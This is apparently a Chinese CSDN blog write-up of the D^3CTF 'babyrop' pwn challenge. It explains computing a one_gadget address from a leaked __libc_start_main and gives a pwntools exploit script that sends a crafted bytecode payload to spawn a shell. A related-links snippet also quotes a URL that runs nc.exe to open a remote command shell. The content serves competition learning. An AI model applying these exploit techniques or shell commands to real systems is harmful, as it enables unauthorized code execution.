D^3CTF babyrop 经验总结

最新推荐文章于 2024-05-23 12:38:45 发布
最新推荐文章于 2024-05-23 12:38:45 发布
阅读量594 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/103303984
版权

思路:
调试时发现在栈中有一个libc_start_main的地址
在这里插入图片描述
可以根据这个地址算出距one_gadget 的偏移
在这里插入图片描述
得到这个偏移后再让libc_start_main这个地址加上这个偏移即可得到one_gaget的地址, 之后再用这个地址覆盖ret即可getshell, 需要注意的是要满足one_gadget的约束条件, 我选则的是偏移为0x4526a 处的one_gadget, 所以需要保证[rsp + 0x30] == NULL 满足

调用的相关函数:

使栈中的数据相加
在这里插入图片描述
调整 “栈指针”, 使"栈指针"想上移动
在这里插入图片描述
向栈中写入零
在这里插入图片描述

还需要注意的是检查的数据的类型是无符号数, 在多次调用0x28指令后
前三个入栈的指令都无法执行, 所以要通过其它指令来达到写零与覆写ret的目的
在这里插入图片描述

EXP:

from pwn import *

context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
debug = 1
d = 1

execve = "./babyrop"
if debug == 1:
	p = process(execve)
	if d == 1:
		gdb.attach(p)
else:
	p = remote("106.54.67.184", 15924)

#0x28 -> *(_DWORD*)(a3 + 16) = 0
#0x42 -> *a1 - 8
#0x34 -> *a1 - 8, copy stack data

payload = '\x28\x28\x28' + '\x34'*12 + '\x56' + p32(0x24a3a) + '\x21' + '\x34\x34\x34\x34\x34'
p.sendline(payload)

'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
    [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
	[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
	 [rsp+0x70] == NULL
'''

raw_input()

p.interactive()

复现结果:
在这里插入图片描述

苍崎青子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF隐写总结
Lemon's blog
04-06 3886
CTF隐写总结 一:LSB隐写
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
2022-D^3CTF-Web-Writeup
feng的博客
03-07 5497
2022-D^3CTF-Web-Writeup 前言 比赛的时候做了shorter就摆烂了,正好有个作业拖到了周末别的题目就没怎么看。幸好比赛环境还保存1周,把Java给复现了,剩下3题看看wp学习学习不想复现了。别的题目的wp参考网上吧。 shorter rome反序列化,但是要缩短长度。 参考https://4ra1n.love/post/-IMSkqHfy/#%E5%88%A0%E9%99%A4%E9%87%8D%E5%86%99%E6%96%B9%E6%B3%95 但是最后还是长了。改用Jiang宝
wav文件隐写:Deepsound+TIFF图片PS处理( AntCTF x D^3CTF 2022 misc BadW3ter)
Hardworking666的博客
03-08 6273
解题步骤wav文件头实例分析修改wav头DeepSound隐写file识别文件+PS处理 AntCTF x D^3CTF背景: 三支“电子科大”队伍:杭电 Vidar-Team、西电 L-Team 及成电 CNSS 共同举办,蚂蚁金服安全应急响应中心赞助。 官网:https://d3ctf.io/#/ 题目:BadW3ter wav文件头实例分析 (1)52 49 46 46 ,这个是Ascii字符“RIFF”,这部分是固定格式,表明这是一个WAVE文件头。 (2)22 60 28 00,这个是我这个
CTF比赛总结(小白必看)
最新发布
qq_53272273的博客
05-23 1421
它被设计为tcpdump 和其他使用 libpcap 库的软件使用的原始 PCAP格式的可扩展继承者.目前,只有 Wireshark 可以读取和写入 PCAPNG 文件,而 libpcap(以及使用它的软件)只能读取其中一些文件。:用16进制编辑工具更改图片的高度,会只显示图片的一部分,下面的部分就被隐藏了,可以先看看图片的属性,得到宽高值,找表示宽度和高度的位置的再转成16进制。特征:文由0和1构成,可能由空格、tab或则其他字符分割,去掉这些分割后,0和1的总数是5的倍数。
D0g3 CTF-WEB
啊哦的博客
10-09 7364
这是我目前发现的一个最适合新手的ctf训练平台,下面是一部分web篇的做题记录==0x00 header 题目链接 看到题目名字,就知道是在响应头信息里,打开firebug,查找net信息: 果然可以找到flag!这算是签到题吧==。0x01 cookie是啥 题目链接 看到题目应该就知道是要抓包改包,首先看看响应头信息,发现cookie=0,题目问cookie是啥,根据提示:ps:0=n
CTF杂项总结
夏日 の blog
02-01 2万+
目录 一、流量分析篇 二、文件头篇 三、压缩包篇 四、图片隐写篇 五、音频隐写篇 六、视频隐写 七、取证 八、Other 参考文章: 一、流量分析篇 通常比赛中会提供一个包含流量数据的 PCAP 文件,有时候也会需要选手们先进行修复或重构传输文件后,再进行分析。 PCAP 这一块作为重点考察方向,复杂的地方在于数据包里充满着大量无关的流量信息,因此如何分类和过滤数据是参赛者...
2019 D^3CTF_wp:fakeonlinephp解法(类实网渗透)
Smity的博客
11-26 3490
D3ctf fake_online_php 题解 外网渗透部分 smb协议利用导致远程文件包含 http://35547429ed.fakeonelinephp.d3ctf.io/?orange=\**********\share\test5&a=…\nc2.exe±e+cmd+39.105.136.196+30023 内网渗透部分 再写一个马子 进入远程桌面 ...
ctf中压缩包隐写经验总结
fox_wayen的博客
10-03 1万+
1 暴力破解密码 使用神器Ziperello基本八位数字以下都是秒破,但缺点就是只能在密码全为数字且长度较小时好用 2 crc32 爆破: 这种题一般是压缩包密码无法破解,但压缩包内的内容比较短的话可以直接爆破crc32,脚本如下 zlib库 12345678910import zlib for i in xrange(100000):    s = st
CTF unserialize3
艺博东的博客
09-25 1万+
题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%2
CTF密码学总结(二)
热门推荐
沐一 · 林 的博客
11-03 2万+
CTF 密码学总结 出人意料的flag: 指在题目中获取到了flag,但是这个flag可能长得不像flag,或者flag还要经过进一步的脑洞处理,而不是常规的解密处理。 非预期行为: 指解题中出现与预想结果不符合的一系列非预期行为,这基本说明了在中间或前面存在其他自己还没分析的操作。 冗余中锁定关键代码: 从后往前看,就是确定比较关键对象,从该对象开始排除其他无关变量,一步步找出与该对象有关的其它变量,最后串起找到的所有相关变量,然后开始逆向分析。 题目类型总结: 题目描述暗
CTF密码学总结(一)
沐一 · 林 的博客
11-01 2万+
目录 CTF 密码学总结 题目类型总结: 简单密码类型: 复杂密码类型: 密码学脚本类总结: 单独的密文类型(优先使用ciphey工具) 多层传统加密混合: Bugku的密码学的入门题/.-:(摩斯密码、url编码、出人意料的flag) 攻防世界之混合编码:(base64解密、unicode解密、ASCII转字符脚本、传统base64解密、ASCII解密) 单层传统加密: Bugku crypto之聪明的小羊:(题目描述暗示、栅栏密码) 攻防世界之转轮机加密:(转轮机加密、)
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
CTF常见密码总结.docx
04-10
ctf解题中总结的一些实用的密码(编码方式),非常适合刚入坑的新手参考学习。比如常见的栅栏密码,摩斯电码,还有一些不常见的比如培根密码等等等等,非常全面!!!
CTF隐写详细总结,自带ctf工具集
11-30
CTF隐写详细总结,自带ctf工具集。 0、图片隐写 1、音频隐写 波形隐写 频谱隐写 LSB隐写 2、视频隐写 3、Base64隐写 4、Python代码隐写 5、Pdf隐写 6、Office文档隐写 7、Ntfs数据流隐写
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4864
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3012
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1766
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
Ant x D^3 CTF 挑战赛官方解析与漏洞利用
"Ant x D^3 CTF官方解答报告" 这篇PDF文件是关于一场名为Ant x D^3的网络安全竞赛(CTF:Capture The Flag)的官方解答报告,涵盖了多个技术领域,包括逆向工程、漏洞利用、Web安全、密码学以及杂项等。下面是对各...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值